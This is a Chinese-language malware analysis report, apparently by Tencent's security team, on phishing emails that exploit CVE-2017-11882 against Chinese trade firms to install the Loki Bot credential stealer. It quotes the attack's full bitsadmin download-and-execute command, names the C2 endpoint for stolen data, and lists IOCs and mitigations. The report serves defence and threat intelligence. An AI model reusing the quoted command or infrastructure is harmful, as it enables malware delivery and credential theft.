中国进出口企业遭遇“商贸信”攻击,企业机密被窃取

2018-06-06 146991人围观 ,发现 4 个不明物体 企业安全

0×1 背景

腾讯御见威胁情报中心监测发现,近期针对中国进出口企业的网络攻击再次抬头。黑客攻击的目标是中国电子科技、外贸、远洋运输企业,攻击者发送精心准备的与企业业务相关的诱饵邮件,附件是利用Office漏洞(漏洞编号:CVE-2017-11882)特别定制的攻击文档,存在漏洞的电脑上打开附件会立刻中毒。漏洞触发后利用bitsadmin下载Loki Bot木马并执行,然后窃取受害人员各类账号密码等机密信息。

2017年12月5号,腾讯安全御见情报中心曾发布预警:一款针对外贸行业的“商贸信”病毒,将利用CVE-2017-11882漏洞的Word文档伪装成采购清单、帐单等文件,通过邮件在全球外贸行业内大量传播,仅一天时间国内就有约10万多国内用户收到此类钓鱼邮件。

2018年2月26日捕获到doc文档样本通过下载并运行已被公开源码的“波尼”木马,窃取用户比特币钱包文件等敏感信息,这些攻击文档同样利用了CVE-2017-11882漏洞。

最新的拦截数据表明,此类定向投放到中国进出口企业的攻击邮件每天有上千封之多,病毒变种也层出不穷。腾讯安全专家建议中国进出口相关企业务必高度警惕,采用必要的防御措施防止企业机密信息泄露。

攻击流程:

1.png

0×2 具体分析

诱饵邮件为伪装成国际物流公司DHL发出的寄件包裹确认信。对于运输业的从业人员而言,此类邮件有相当高的诱导性,很容易被认定为运输合作伙伴的信件。

0505.jpg

内容直译:

3.png

附件doc内容:

 提示“Loading…”

02.png

空白图表

03.png

打开邮件doc文档,触发CVE-2017-11882漏洞,执行命令行

cmd.exe /c bitsadmin /transfer Fq /priority foreground hxxp://internationalcon.com/ar/home/eat.exe %USERPROFILE%/iWa.exe && start %USERPROFILE%/iWa.exe

bitsadmin.exe 可以用来在windows 命令行下下载文件,是windows 后台智能传输服务的一个工具,windows也会使用它来进行自动更新、下载补丁,此工具在黑客渗透攻击中也较为流行。

4.png

访问internationalcon.com发现该地址为阿联酋沙迦的某国际建筑设计公司网站,疑似被黑客攻击利用。

5.png

下载的exe样本采用aPLib加壳。nlo.exe为.net版;eat.exe为Delphi版,脱壳后都是“Loki Bot”木马。

6.png

7.png

“Loki Bot”是在地下网站上销售的商业恶意软件,功能为从受感染机器窃取私人数据,然后通过HTTP POST将该信息提交给控制主机。这些私人数据包括存储的密码,Web浏览器的登录凭证信息,以及各种加密货币钱包等。

8.png

装载功能:

启动(常驻装载机)

下载并运行(exe | dll)

下载和投递

更新木马

卸载木马

根据请求从控制端获取密码

加载到选定的国家

设置重新连接间隔

获取截图

支持的浏览器:

Internet Explorer

Mozilla Firefox (x32+x64)

Google Chrome

KMeleon

Comodo Dragon

Comodo IceDragon

SeaMonkey

Opera

Safari

CoolNovo

Rambler Nichrome

RockMelt

Baidu Spark

Chromium

Titan Browser

Torch Browser

Yandex.Browser

Epic Privacy Browser

Sleipnir Browser

Vivaldi

Coowon Browser

Superbird Browser

Chromodo Browser

Mustan Browser

360 Browser

Cyberfox (x32+x64)

Pale Moon

Maxthon browser

Citrio Browser

Chrome Canary

Waterfox

Orbitum

Iridium

支持的 FTP/VNC 客户端:

Total Commander

FlashFXP

FileZilla

FAR Manager

CyberDuck

Bitvise

NovaFTP

NetDrive

NppFTP

FTPShell

SherrodFTP

MyFTP

FTPBox

FtpInfo

Lines FTP

FullSync

Nexus File

JaSFtp

FTP Now

Xftp

Easy FTP

GoFTP

NETFile

Blaze Ftp

StaffFTP

DeluxeFTP

ALFTP

FTPGetter

WS_FTP

AbleFTp

Automize

RealVNC

TightVNC

Syncovery

mSecure Wallet

SmartFTP

FreshFTP

BitKinex

UltraFXP

FTP Rush

Vandyk SecureFX

OdinSecure FTP Expert

Fling

ClassicFTP

Maxthon browser

Kitty(login+private key)

WinSCP

Remmina RDP

WinFTP

32Bit FTP

FTP Navigator

支持的 Email 客户端:

Outlook (20032016)

Mozilla Thunderbird

Foxmail

Pocomail

Incredimail

Gmail Notifier Pro

SNetz Mailer

Checkmail

Opera Mail

FossaMail

MailSpeaker

yMail

支持的 IM 客户端:

Pidgin

密码管理工具:

EnPass

KeePass

1Password

AI RoboForm

获取MachineGuid

9.png

读取浏览器登录信息

10.png

支持的浏览器

11.png

读取浏览器.ini文件

12.png

读取SQLite数据库信息

13.png

读取FIP客户端文件信息

14.png

15.png

读取SMTP客户端信息

16.png

将获取的信息发送到C2地址hxxp://delamodegroup.com/mithcin/fre.php

17.png

0×3 溯源

通过腾讯御见威胁情报中心查询此次攻击的C2域名,发现这些域名都指向地址位于香港的IP:45.122.138.118

66.png

在某些C2域名上还保存有木马控制端的源码文件

19.png

20.png

从源码的数据库相关代码可以看到,木马服务端保存有日志,钱包,命令等数据表。

21.png

由于Loki Bot木马与Fareit家族木马、“波尼”木马在功能上有很大的相似之处,都是窃取用户的浏览器登录、邮件客户端等各类信息并上传,所以很容易混淆。但是我们发现在木马向C2进行POST上传数据都会带一个特殊字符“ckav.ru”

22.png

23.png

通过搜索引擎查找信息发现这是Loki Bot用来跟踪记录木马使用情况的特殊标记,疑似和俄罗斯地下黑客交易域名“xxckav.ru”有关。

24.png

进一步发现该软件的出售信息

展示界面:

25.png

价格: 80美元(不提供托管),100美元(提供托管一个月)

联系方式:

Jabber:  lokibotseller@thesecure.biz

ICQ:  823115

Skype: live:loki823115

作者使用与Skype账号对应的outlook邮箱loki823115@outlook.com

注册过域名gameirntplc.com登记国家显示为尼日利亚。

26.png

0×4 安全建议

1. 安装漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

2. 禁用公式编辑器组件:

a) 可以通过运行如下命令禁用Office编辑器:

reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-000000000046}" /v"Compatibility Flags" /t REG_DWORD /d 0x400

b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令:

reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM  Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400

3. 推荐企业内网使用腾讯御点终端安全管理系统(下载地址:https://s.tencent.com/product/yd/index.html)防御病毒木马威胁。

0404.png

4. 企业网管,可以为防火墙新增IOCs里ip和url的拦截。

0×5 IOCs

IP:

52.50.65.32

45.122.138.118

66.96.149.28

域名:

internationalcon.com

enerrpac.com

phcc-india.com

grantis.us

baidudownload.com

kaokao-twn.com

anguiillanet.com

mclhk-net.com

oliverrbatlle.com

anchormarineqroup.com

xemontdsd.xyz

delamodegroup.com

geranntibankasi.com

C2:

hxxp://anguiillanet.com/freeme/fre.php

hxxp://kaokao-twn.com/exploitedreal/fre.php

hxxp://grantis.us/metuseller/fre.php

hxxp://oliverrbatlle.com/dprince/fre.php

hxxp://anguiillanet.com/timezone/fine/fre.php

hxxp://phcc-india.com/kcee/five/fre.php

hxxp://enerrpac.com/cmerise/fre.php

hxxp://phcc-india.com/house/five/fre.php

hxxp://enerrpac.com/faithour/fre.php

hxxp://oliverrbatlle.com/davido/fre.php

hxxp://mclhk-net.com/chanelstv/fre.php

hxxp://mclhk-net.com/amonia/fre.php

hxxp://geranntibankasi.com/corp/nel/fre.php

hxxp://oliverrbatlle.com/dbanj/fre.php

hxxp://xemontd.xyz/saixxy/fre.php

hxxp://grantis.us/metuseller/five/fre.php

hxxp://mclhk-net.com/hiswounds/fre.php

hxxp://oliverrbatlle.com/wizkid/fre.php

hxxp://baidudownload.com/targert/fre.php

hxxp://baidudownload.com/tempot/fre.php

hxxp://delamodegroup.com/sam101/fre.php

url:

hxxp://internationalcon.com/ar/jakuzo/fynoy/ste.exe

hxxp://internationalcon.com/ar/home/eat.exe

hxxp://internationalcon.com/ar/nlo.exe 

hxxp://internationalcon.com/ar/jakuzo/fynoy/olumain/djuk/press.exe 

hxxp://internationalcon.com/ar/jakuzo/fynoy/olumain/sam.exe

hxxp://internationalcon.com/ar/jakuzo/fynoy/ste.exe 

hxxp://internationalcon.com/assets/css/qaz.exe

hxxp://internationalcon.com/assets/fonts/cpanel/war.exe

md5:

4a4cbf00af97bb62c18c65be20e12374

6c7dbda205cc82870316e6e5721cdc04

8f112db3c8c43c6cf8eecb5319bf79bd

019ebf613d2ece1967fc2b4a2bdbb513

49fcb43c91d5cfcaaf492ff78b1fb497

67b506a1f11a0a49fd91e72d8ee16bf7

250a8f0e43f4da59102b815d30eb6635

7917c644bd60d0f063495b12653d1ccd

0196805b3b805d0fa2c9b4ab3f162cea

b60c179cbe88ef5f53a27adbb22d810e

01c13b6afa2e50913a782993a4fdc715

23ed4375e8c8c78975f3cf35bb01b54a

b5b95ad3373e9039614aa424876474c5

相关链接:

《危机四伏的Office高危漏洞CVE-2017-11882》

《“商贸信”病毒:外贸行业的梦魇》

《CVE-2017-11882漏洞新利用:下载波尼木马窃取加密货币钱包文件》

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

发表评论

已有 4 条评论

取消
Loading...
css.php